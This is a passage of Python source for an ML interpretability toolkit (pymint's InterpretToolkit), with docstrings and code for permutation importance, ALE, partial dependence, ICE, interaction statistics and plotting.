y=%s length:%d \n \
estimator_output=%s \n \
feature_names=%s length %d)' % \
(self.estimators,
self.estimator_names,
type(self.X), len(self.X),
type(self.y), len(self.y),
self.estimator_output,
type(self.feature_names), len(self.feature_names))
def _append_attributes(self,ds):
"""
FOR INTERNAL PURPOSES ONLY.
Append attributes to a xarray.Dataset or pandas.DataFrame
Parameters
----------
ds : xarray.Dataset or pandas.DataFrame
Results data from the IML methods
"""
for key in self.attrs_dict.keys():
ds.attrs[key] = self.attrs_dict[key]
return ds
def permutation_importance(self, n_vars, evaluation_fn, direction='backward',
subsample=1.0, n_jobs=1, n_bootstrap=None, scoring_strategy=None, verbose=False, random_state=None,
return_iterations=False,
):
"""
Performs single-pass and/or multi-pass permutation importance using a modified version of the
PermutationImportance package (pymint.PermutationImportance) [1]_. The single-pass approach was first
developed in Brieman (2001) [2]_ and then improved upon in Lakshmanan et al. (2015) [3]_.
.. attention ::
The permutation importance rankings can be sensitive to the evaluation function used.
Consider re-computing with multiple evaluation functions.
.. attention ::
The permutation importance rankings can be sensitive to the direction used.
Consider re-computing with both forward- and backward-based methods.
.. hint ::
Since the permutation importance is a marginal-based method, you can often use
subsample << 1.0 without substantially altering the feature rankings.
Using a subsample << 1.0 can reduce the computation time for larger datasets (e.g., >100 K X),
especially since 100-1000s of bootstrap iterations are often required for reliable rankings.
Parameters
----------
n_vars : integer
number of variables to calculate the multipass permutation importance for. If ``n_vars=1``, then
only the single-pass permutation importance is computed. If ``n_vars>1``, both the single-pass
and multiple-pass are computed.
evaluation_fn : string or callable
evaluation/scoring function for evaluating the loss of skill once a feature is permuted.
evaluation_fn can be set to one of the following strings:
- ``"auc"``, Area under the Curve
- ``"auprc"``, Area under the Precision-Recall Curve
- ``"bss"``, Brier Skill Score
- ``"mse"``, Mean Square Error
- ``"norm_aupdc"``, Normalized Area under the Performance Diagram (Precision-Recall) Curve
Otherwise, evaluation_fn can be any function of form,
`evaluation_fn(targets, predictions)` and must return a scalar value
When using a custom function, you must also set the scoring strategy (see below).
scoring_strategy : string (default=None)
This argument is only required if you are using a non-default evaluation_fn (see above)
If the evaluation_fn is positively-oriented (a higher value is better),
then set ``scoring_strategy = "argmin_of_mean"`` and if it is negatively-oriented-
(a lower value is better), then set ``scoring_strategy = "argmax_of_mean"``
direction : ``"forward"`` or ``"backward"``
For the multi-pass method. For ``"backward"``, the top feature is left permuted before determining
the second-most important feature (and so on). For ``"forward"``, all features are permuted
and then the top features are progressively left unpermuted. For real-world datasets, the two
methods often do not produce the same feature rankings and is worth exploring both.
subsample: float or integer (default=1.0 for no subsampling)
if value is between 0-1, it is interpreted as fraction of total X to use
if value > 1, interpreted as the number of X to randomly sample
from the original dataset.
n_jobs : interger or float (default=1; no multiprocessing)
if integer, interpreted as the number of processors to use for multiprocessing
if float between 0-1, interpreted as the fraction of proceesors to use for multiprocessing
n_bootstrap: integer (default=None for no bootstrapping)
Number of bootstrap iterations for computing confidence intervals on the feature rankings.
random_state : int, RandomState instance, default=None
Pseudo-random number generator to control the permutations of each
feature. Pass an int to get reproducible results across function calls.
verbose : boolean
True for print statements on the progress
Returns
--------
results : xarray.DataSet
Permutation importance results. Includes the both multi-pass and single-pass
feature rankings and the scores with the various features permuted.
References
-----------
.. [1] https://github.com/gelijergensen/PermutationImportance
.. [2] L. Breiman, "Random Forests", Machine Learning, 45(1), 5-32, 2001.
.. [3] Lakshmanan, V., C. Karstens, J. Krause, K. Elmore, A. Ryzhkov, and S. Berkseth, 2015:
Which Polarimetric Variables Are Important for Weather/No-Weather Discrimination?
Journal of Atmospheric and Oceanic Technology, 32, 1209–1223,
https://doi.org/10.1175/jtech-d-13-00205.1.
Examples
----------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> # Only compute for the first model
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs[0],
... estimator_names=estimator_names[0],
... X=X,
... y=y,
... )
>>> perm_imp_results = explainer.permutation_importance(
... n_vars=10,
... evaluation_fn = 'norm_aupdc',
... subsample=0.5,
... n_bootstrap=20,
... )
>>> print(perm_imp_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 20, n_vars_multipass: 10, n_vars_singlepass: 30)
Dimensions without coordinates: n_bootstrap, n_vars_multipass, n_vars_singlepass
Data variables:
multipass_rankings__Random Forest (n_vars_multipass) <U17 'sfc_te...
multipass_scores__Random Forest (n_vars_multipass, n_bootstrap) float64 ...
singlepass_rankings__Random Forest (n_vars_singlepass) <U17 'sfc_t...
singlepass_scores__Random Forest (n_vars_singlepass, n_bootstrap) float64 ...
original_score__Random Forest (n_bootstrap) float64 0.9851 .....
Attributes:
estimator_output: probability
estimators used: ['Random Forest']
n_multipass_vars: 10
method: permutation_importance
direction: backward
evaluation_fn: norm_aupdc
"""
results_ds = self.global_obj.calc_permutation_importance(n_vars=n_vars,
evaluation_fn=evaluation_fn,
subsample=subsample,
n_jobs=n_jobs,
n_bootstrap=n_bootstrap,
scoring_strategy=scoring_strategy,
verbose=verbose,
direction=direction,
random_state=random_state,
return_iterations=return_iterations,
)
self.attrs_dict['n_multipass_vars'] = n_vars
self.attrs_dict['method'] = 'permutation_importance'
self.attrs_dict['direction'] = direction
self.attrs_dict['evaluation_fn'] = evaluation_fn
results_ds = self._append_attributes(results_ds)
return results_ds
def ale_variance(self,
ale,
features=None,
estimator_names=None,
interaction=False,
):
"""
Compute the standard deviation (std) of the ALE values for each
features in a dataset and then rank by the magnitude. A higher std(ALE) indicates a
greater expected contribution to an estimator's prediction and is thus considered more important.
If ``interaction=True``, then the method computes a similar method for the
2D ALE to measure the feature interaction strength.
This method is inspired by the feature importance and interaction
methods developed in Greenwell et al. (2018) [4]_.
Parameters
----------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale` for
``features``.
features : 'all', string, list of strings, list of 2-tuples
Features to compute the ALE variance for. If set to ``'all'``, it is
computed for all features. If ``interaction=True``, then features
must be a list of 2-tuples for computing the interaction between
the set of feature combinations.
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the ALE variance for.
interaction : boolean
- If True, it computes the feature interaction strength
- If False, compute the feature importance
Returns
--------
results_ds : xarray.Dataset
ALE variance results. Includes both the rankings and scores.
References
-------------
.. [4] Greenwell, B. M., B. C. Boehmke, and A. J. McCarthy, 2018:
A Simple and Effective estimator-Based Variable Importance Measure. Arxiv,.
Examples
-----------
>>> import pymint
>>> import itertools
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all', n_bins=10, subsample=1000, n_bootstrap=1)
>>> # Compute 1D ALE variance
>>> ale_var_results = explainer.ale_variance(ale)
>>> print(ale_var_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 1, n_vars_ale_variance: 30)
Dimensions without coordinates: n_bootstrap, n_vars_ale_variance
Data variables:
ale_variance_rankings__Random Forest (n_vars_ale_variance) <U17 'r...
ale_variance_scores__Random Forest (n_vars_ale_variance, n_bootstrap) float64 ...
ale_variance_rankings__Gradient Boosting (n_vars_ale_variance) <U17 'u...
ale_variance_scores__Gradient Boosting (n_vars_ale_variance, n_bootstrap) float64 ...
ale_variance_rankings__Logistic Regression (n_vars_ale_variance) <U17 'r...
ale_variance_scores__Logistic Regression (n_vars_ale_variance, n_bootstrap) float64 ...
Attribute:
estimator_output: probability
estimators used: ['Random Forest', 'Gradient Boosting', 'Logistic Regre...
n_multipass_vars: 5
method: ale_variance
direction: backward
evaluation_fn: sigma_ale
dimension: 1D
features used: ['dllwave_flux', 'dwpt2m', 'fric_vel', 'gflux', 'high_...
estimator output: probability
interaction: False
>>> #Typical, we only want to evaluate the feature interactions for
>>> # the most important features
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez', 'tmp2m_hrs_bl_frez',
... 'uplwav_flux']
>>> # Create all possible combinations
>>> important_vars_2d = list(itertools.combinations(important_vars, r=2))
>>> #For the 2D ALE variance to measure feature interaction strength
>>> ale_2d = explainer.ale(features=important_vars_2d, n_bins=10,
... subsample=1000, n_bootstrap=1)
>>> # Compute 2D ALE variance
>>> ale_var_results = explainer.ale_variance(ale_2d, features=important_vars_2d,
... interaction=True)
>>> print(ale_var_results)
<xarray.Dataset>
Dimensions: (n_bootstrap: 1, n_vars_ale_variance_interactions: 10)
Dimensions without coordinates: n_bootstrap, n_vars_ale_variance_interactions
Data variables:
ale_variance_interactions_rankings__Random Forest (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Random Forest (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
ale_variance_interactions_rankings__Gradient Boosting (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Gradient Boosting (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
ale_variance_interactions_rankings__Logistic Regression (n_vars_ale_variance_interactions) <U35 ...
ale_variance_interactions_scores__Logistic Regression (n_vars_ale_variance_interactions, n_bootstrap) float64 ...
Attribute:
estimator_output: probability
estimators used: ['Random Forest', 'Gradient Boosting', 'Logistic Regre...
n_multipass_vars: 5
method: ale_variance
direction: backward
evaluation_fn: Interaction Importance
dimension: 2D
features used: [('sfc_temp', 'temp2m'), ('sfc_temp', 'sfcT_hrs_bl_fre...
estimator output: probability
interaction: True
"""
if (features == 'all' or features is None) and interaction:
features = list(itertools.combinations(self.feature_names, r=2))
if estimator_names is None:
estimator_names = self.estimator_names
if is_str(estimator_names):
estimator_names = [estimator_names]
if interaction:
if ale.attrs['dimension'] != '2D':
raise Expection("ale must be compute for second-order ALE if interaction == True")
# Check that ale_data is an xarray.Dataset
if not isinstance(ale, xr.core.dataset.Dataset):
raise ValueError("""
ale must be an xarray.Dataset,
perferably generated by InterpretToolkit.ale
to be formatted correctly
""")
else:
any_missing = all([m in ale.attrs['estimators used'] for m in estimator_names])
if not any_missing:
raise ValueError('ale does not contain values for all the estimator names given!')
if interaction:
func = self.global_obj.compute_interaction_rankings
else:
func = self.global_obj.compute_ale_variance
results_ds = func(data=ale, estimator_names=estimator_names, features=features,)
self.attrs_dict['method'] = 'ale_variance'
self.attrs_dict['estimators used'] = estimator_names
self.attrs_dict['estimator output'] = 'probability'
self.attrs_dict['interaction'] = str(interaction)
if interaction:
self.attrs_dict['evaluation_fn'] = 'Interaction Importance'
else:
self.attrs_dict['evaluation_fn'] = 'sigma_ale' #'$\sigma$(ALE)'
results_ds = self._append_attributes(results_ds)
return results_ds
def main_effect_complexity(self, ale, estimator_names=None,
max_segments=10, approx_error=0.05):
"""
Compute the Main Effect Complexity (MEC; Molnar et al. 2019) [5]_.
MEC is the number of linear segements required to approximate
the first-order ALE curves averaged over all features.
The MEC is weighted-averged by the variance. Higher values indicate
a more complex estimator (less interpretable).
References
-----------
.. [5] Molnar, C., G. Casalicchio, and B. Bischl, 2019: Quantifying estimator Complexity via
Functional Decomposition for Better Post-Hoc Interpretability. ArXiv.
Parameters
----------------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale`. Must be computed for all features in X.
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the MEC for.
max_segments : integer; default=10
Maximum number of linear segments used to approximate the main/first-order
effect of a feature. default is 10. Used to limit the computational runtime.
approx_error : float; default=0.05
The accepted error of the R squared between the piece-wise linear function
and the true ALE curve. If the R square is within the approx_error, then
no additional segments are added.
Returns
---------
mec_dict : dictionary
mec_dict = {estimator_name0 : mec0, estimator_name1 : mec2, ..., estimator_nameN : mecN,}
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all', n_bins=20, subsample=0.5, n_bootstrap=20)
>>> # Compute Main Effect Complexity (MEC)
>>> mec_ds = explainer.main_effect_complexity(ale)
>>> print(mes_ds)
{'Random Forest': 2.6792782503392756,
'Gradient Boosting': 2.692392706080586,
'Logistic Regression': 1.6338281469152958}
"""
if estimator_names is None:
estimator_names=self.estimator_names
else:
if is_str(estimator_names):
estimator_names=[estimator_names]
mec_dict = {}
for estimator_name in estimator_names:
mec, _ = self.global_obj.compute_main_effect_complexity(
estimator_name=estimator_name,
ale_ds=ale,
features=self.feature_names,
max_segments=max_segments,
approx_error=approx_error
)
mec_dict[estimator_name] = mec
return mec_dict
def perm_based_interaction(self, features, evaluation_fn,
estimator_names=None, n_jobs=1, subsample=1.0,
n_bootstrap=1, verbose=False):
"""
Compute the performance-based feature interactions from Oh (2019) [6]_.
For a pair of features, the loss of skill is recorded for permuting
each feature separately and permuting both. If there is no feature interaction
and the covariance between the two features is close to zero, the sum of the
individual losses will approximately equal the loss of skill from permuting
both features. Otherwise, a non-zero difference indicates some interaction.
The differences for different pairs of features can be used to rank the
strength of any feature interactions.
References
-------------
.. [6] Oh, Sejong, 2019. Feature Interaction in Terms of Prediction Performance
https://www.mdpi.com/2076-3417/9/23/5191
Parameters
-----------
features : list of 2-tuple of strings
Pairs of features to compute the interaction strength for.
evaluation_fn : string or callable
evaluation/scoring function for evaluating the loss of skill once a feature is permuted.
evaluation_fn can be set to one of the following strings:
- ``"auc"``, Area under the Curve
- ``"auprc"``, Area under the Precision-Recall Curve
- ``"bss"``, Brier Skill Score
- ``"mse"``, Mean Square Error
- ``"norm_aupdc"``, Normalized Area under the Performance Diagram (Precision-Recall) Curve
Otherwise, evaluation_fn can be any function of form,
`evaluation_fn(targets, predictions)` and must return a scalar value
estimator_names : string, list of strings
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute for.
subsample: float or integer (default=1.0 for no subsampling)
- if value is between 0-1, it is interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_jobs : interger or float (default=1; no multiprocessing)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float between 0-1, interpreted as the fraction of proceesors to use for multiprocessing
n_bootstrap: integer (default=None for no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the feature pair rankings.
Returns
---------
results_ds : xarray.Dataset
Permutation importance-based feature interaction strength results
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez', 'tmp2m_hrs_bl_frez',
... 'uplwav_flux']
>>> important_vars_2d = list(itertools.combinations(important_vars, r=2))
>>> perm_based_interact_ds = explainer.perm_based_interaction(
... important_vars_2d, evaluation_fn='norm_aupdc',
... )
"""
if estimator_names is None:
estimator_names=self.estimator_names
else:
if is_str(estimator_names):
estimator_names=[estimator_names]
results_ds = self.global_obj.compute_interaction_rankings_performance_based(
estimator_names,
features,
evaluation_fn=evaluation_fn,
estimator_output=self.estimator_output,
subsample=subsample,
n_bootstrap=n_bootstrap,
n_jobs=n_jobs,
verbose=verbose)
self.attrs_dict['method'] = 'perm_based'
self.attrs_dict['estimators used'] = estimator_names
self.attrs_dict['estimator output'] = self.estimator_output
self.attrs_dict['evaluation_fn'] = 'Interaction Importance'
results_ds = self._append_attributes(results_ds)
return results_ds
def ice(self, features, n_bins=30, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Compute the indiviudal conditional expectations (ICE) [7]_.
References
------------
.. [7] https://christophm.github.io/interpretable-ml-book/ice.html
Parameters
-----------
features : string or list of strings or 'all'
Features to compute the ICE for. if 'all', the method will compute
the ICE for all features.
n_bins : integer (default=30)
Number of bins used to compute the ICE for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the ICE curves.
Returns
---------
results : xarray.DataSet
Main keys are the user-provided estimator names while the sub-key
are the features computed for. The items are data for the ICE curves. Also,
contains X data (feature values where the ICE curves were computed) for plotting.
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ice_ds = explainer.ice(features='all', subsample=200)
"""
if is_str(features):
if features == 'all':
features = self.feature_names
results_ds = self.global_obj._run_interpret_curves(method="ice",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance(list(features)[0], tuple) else '1D'
self.attrs_dict['method'] = 'ice'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.feature_used=features
return results_ds
def pd(self, features, n_bins=25, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Computes the 1D or 2D centered partial dependence (PD) [8]_.
References
------------
.. [8] https://christophm.github.io/interpretable-ml-book/pdp.html
Parameters
----------
features : string or list of strings or 'all'
Features to compute the PD for. if 'all', the method will compute
the PD for all features.
n_bins : integer (default=30)
Number of bins used to compute the PD for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the PD curves.
Returns
--------
results : xarray.DataSet
Partial dependence result dataset
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd = explainer.pd(features='all')
"""
if is_str(features):
if features == 'all':
features = self.feature_names
if features == 'all_2d':
features = list(itertools.combinations(self.feature_names, r=2))
results_ds = self.global_obj._run_interpret_curves(method="pd",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance( list(features)[0] , tuple) else '1D'
self.attrs_dict['method'] = 'pd'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.features_used = features
return results_ds
def ale(self, features=None, n_bins=30, n_jobs=1, subsample=1.0, n_bootstrap=1):
"""
Compute the 1D or 2D centered accumulated local effects (ALE) [9]_ [10]_.
For categorical features, simply set the type of those features in the
dataframe as ``category`` and the categorical ALE will be computed.
References
-----------
.. [9] https://christophm.github.io/interpretable-ml-book/ale.html
.. [10] Apley, D. W., and J. Zhu, 2016: Visualizing the Effects of Predictor Variables in
Black Box Supervised Learning Models. ArXiv.
Parameters
----------
features : string or list of strings or 'all'
Features to compute the PD for. if 'all', the method will compute
the ALE for all features.
n_bins : integer (default=30)
Number of bins used to compute the ALE for. Bins are decided based
on percentile intervals to ensure the same number of samples are in
each bin.
n_jobs : float or integer (default=1)
- if integer, interpreted as the number of processors to use for multiprocessing
- if float, interpreted as the fraction of proceesors to use for multiprocessing
subsample : float or integer (default=1.0)
- if value between 0-1 interpreted as fraction of total X to use
- if value > 1, interpreted as the absolute number of random samples of X.
n_bootstrap : integer (default=1; no bootstrapping)
Number of bootstrap resamples for computing confidence intervals on the ALE curves.
Returns
----------
results : xarray.DataSet
ALE result dataset
Raise
----------
Exception
Highly skewed data may not be divisable into n_bins given. In that case, calc_ale
uses the max bins the data can be divided into. But a warning message is raised.
Examples
---------
>>> import pymint
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
>>> X, y = pymint.load_data() # training data
>>> # Set the type for categorical features and InterpretToolkit with compute the
>>> # categorical ALE.
>>> X = X.astype({'urban': 'category', 'rural':'category'})
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
"""
if is_str(features):
if features == 'all':
features = self.feature_names
if features == 'all_2d':
features = list(itertools.combinations(self.feature_names, r=2))
results_ds = self.global_obj._run_interpret_curves(method="ale",
features=features,
n_bins=n_bins,
n_jobs=n_jobs,
subsample=subsample,
n_bootstrap=n_bootstrap)
dimension = '2D' if isinstance( list(features)[0] , tuple) else '1D'
self.attrs_dict['method'] = 'ale'
self.attrs_dict['dimension'] = dimension
self.attrs_dict['features used'] = features
results_ds = self._append_attributes(results_ds)
self.features_used = features
return results_ds
def friedman_h_stat(self, pd_1d, pd_2d, features, estimator_names=None, **kwargs):
"""
Compute the second-order Friedman's H-statistic for computing feature interactions [11]_ [12]_.
Based on equation (44) from Friedman and Popescu (2008) [12]_. Only computes the interaction strength
between two features. In future versions of PyMint we hope to include the first-order H-statistics
that measure the interaction between a single feature and the
remaining set of features.
References
-----------
.. [11] https://christophm.github.io/interpretable-ml-book/interaction.html
.. [12] Friedman, J. H., and B. E. Popescu, 2008: Predictive learning via rule ensembles.
Ann Appl Statistics, 2, 916–954, https://doi.org/10.1214/07-aoas148.
Parameters
-----------
pd_1d : xarray.Dataset
1D partial dependence dataset. Results of :func:`~InterpretToolkit.pd` for ``features``
pd_2d : xarray.Dataset
2D partial dependence dataset. Results of :func:`~InterpretToolkit.pd`, but 2-tuple combinations
of ``features``.
features : list of 2-tuples of strings
The pairs of features to compute the feature interaction between.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the H-statistic for.
Returns
----------
results_ds : xarray.Dataset
The second-order Friedman H-statistic for all estimators.
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd_1d = explainer.pd(features='all')
>>> pd_2d = explainer.pd(features='all_2d')
>>> hstat = explainer.friedman_h_stat(pd_1d, pd_2d,)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
results_ds = self.global_obj.compute_scalar_interaction_stats(
method = 'hstat',
data=pd_1d,
data_2d = pd_2d,
features=features,
estimator_names=estimator_names,
**kwargs,
)
results_ds = self._append_attributes(results_ds)
return results_ds
def interaction_strength(self, ale, estimator_names=None, **kwargs):
"""
Compute the InterAction Strength (IAS) statistic from Molnar et al. (2019) [5]_.
The IAS varies between 0-1 where values closer to 0 indicate no feature interaction
strength.
Parameters
------------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale`, but must be computed for all features
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to compute the IAS for.
kwargs : dict
- subsample
- n_bootstrap
- estimator_output
Returns
----------
results_ds : xarray.Dataset
Interaction strength result dataset
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
>>> ias = explainer.interaction_strength(ale)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
# Check that ale_data is an xarray.Dataset
if not isinstance(ale, xr.core.dataset.Dataset):
raise ValueError("""
ale must be an xarray.Dataset,
perferably generated by mintpy.InterpretToolkit.calc_ale to be formatted correctly
"""
)
else:
any_missing = all([m in ale.attrs['estimators used'] for m in estimator_names])
if not any_missing:
raise ValueError(f'ale does not contain data for all the estimator names given!')
kwargs['estimator_output'] = self.estimator_output
results_ds = self.global_obj.compute_scalar_interaction_stats(
method = 'ias',
data=ale,
estimator_names=estimator_names,
**kwargs,
)
results_ds = self._append_attributes(results_ds)
return results_ds
def _plot_interpret_curves(self, method, data, estimator_names, features=None,
display_feature_names={}, display_units={},
to_probability=False, **kwargs):
"""
FOR INTERNAL USE ONLY.
Handles 1D or 2D PD/ALE plots.
"""
if features is None:
try:
features = self.features_used
except:
raise ValueError('No features were provided to plot!')
else:
if is_str(features):
features=[features]
if data.attrs['dimension'] == '2D':
plot_obj = PlotInterpret2D()
return plot_obj.plot_contours(method=method,
data=data,
estimator_names=estimator_names,
features=features,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability = to_probability,
**kwargs)
else:
base_font_size = 12 if len(features) <= 6 else 16
base_font_size = kwargs.get('base_font_size', base_font_size)
plot_obj = PlotInterpretCurves(BASE_FONT_SIZE=base_font_size)
return plot_obj.plot_1d_curve(method=method,
data=data,
estimator_names=estimator_names,
features=features,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability = to_probability,
**kwargs)
def plot_pd(self, pd=None, features=None, estimator_names=None,
display_feature_names={}, display_units={},
line_colors=None, to_probability=False, **kwargs):
"""
Runs the 1D and 2D partial dependence plotting.
Parameters
----------
pd : xarray.Dataset
Results of :func:`~InterpretToolkit.pd` for
``features``.
features : string, list of strings, list of 2-tuple of strings
Features to plot the PD for. To plot for 2D PD,
pass a list of 2-tuples of features.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to plot for.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., ``display_feature_names = { 'dwpt2m' : '$T_{d}$', }``
The plotting code can handle latex-style formatting.
display_units : dict
For plotting purposes. Dictionary that maps the feature names
to their units.
E.g., ``display_units = { 'dwpt2m' : '$^\circ$C', }``
line_colors : str or list of strs of len(estimators)
User-defined colors for curve plotting.
to_probability : boolean
If True, the values are multipled by 100.
Keyword arguments include arguments typically used for matplotlib.
Returns
--------
fig, axes: matplotlib figure instance and the corresponding axes
Examples
---------
>>> import pymint
>>> estimator_objs, estimator_names = pymint.load_models() # pre-fit estimators within pymint
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> pd = explainer.calc_pd(features='all')
>>> # Provide a small subset of features to plot
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez',
... 'tmp2m_hrs_bl_frez','uplwav_flux']
>>> explainer.plot_pd(pd, features=important_vars)
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
if pd.attrs['estimator_output'] == 'probability':
to_probability=True
if to_probability:
kwargs['left_yaxis_label'] = 'Centered PD (%)'
else:
kwargs['left_yaxis_label'] = 'Centered PD'
return self._plot_interpret_curves(
method='pd',
data=pd,
features=features,
estimator_names=estimator_names,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability=to_probability,
line_colors=line_colors,
**kwargs)
def plot_ale(self, ale=None, features=None, estimator_names=None,
display_feature_names={}, display_units={},
line_colors=None, to_probability=False, **kwargs):
"""
Runs the 1D and 2D accumulated local effects plotting.
Parameters
----------
ale : xarray.Dataset
Results of :func:`~InterpretToolkit.ale` for
``features``.
features : string, list of strings, list of 2-tuple of strings
Features to plot the PD for. To plot for 2D PD,
pass a list of 2-tuples of features.
estimator_names : string, list of strings (default is None)
If using multiple estimators, you can pass a single (or subset of) estimator name(s)
to plot for.
display_feature_names : dict
For plotting purposes. Dictionary that maps the feature names
in the pandas.DataFrame to display-friendly versions.
E.g., ``display_feature_names = { 'dwpt2m' : '$T_{d}$', }``
The plotting code can handle latex-style formatting.
display_units : dict
For plotting purposes. Dictionary that maps the feature names
to their units.
E.g., ``display_units = { 'dwpt2m' : '$^\circ$C', }``
line_colors : str or list of strs of len(estimators)
User-defined colors for curve plotting.
to_probability : boolean
If True, the values are multipled by 100.
Keyword arguments include arguments typically used for matplotlib.
E.g.,
figsize, hist_color,
Returns
--------
fig, axes: matplotlib figure instance and the corresponding axes
Examples
---------
>>> import pymint
>>> # pre-fit estimators within pymint
>>> estimator_objs, estimator_names = pymint.load_models()
>>> X, y = pymint.load_data() # training data
>>> explainer = pymint.InterpretToolkit(estimators=estimator_objs,
... estimator_names=estimator_names,
... X=X,
... y=y,
... )
>>> ale = explainer.ale(features='all')
>>> # Provide a small subset of features to plot
>>> important_vars = ['sfc_temp', 'temp2m', 'sfcT_hrs_bl_frez',
... 'tmp2m_hrs_bl_frez','uplwav_flux']
>>> explainer.plot_ale(ale, features=important_vars)
.. image :: ../../images/ale_1d.png
"""
if estimator_names is None:
estimator_names = self.estimator_names
else:
if is_str(estimator_names):
estimator_names = [estimator_names]
if ale.attrs['estimator_output'] == 'probability':
to_probability=True
if to_probability:
kwargs['left_yaxis_label'] = 'Centered ALE (%)'
else:
kwargs['left_yaxis_label'] = 'Centered ALE'
return self._plot_interpret_curves(
method = 'ale',
data=ale,
features=features,
estimator_names=estimator_names,
display_feature_names=display_feature_names,
display_units=display_units,
to_probability=to_probability,
line_colors=line_colors,
**kwargs)
def local_contributions(self,
method='shap',
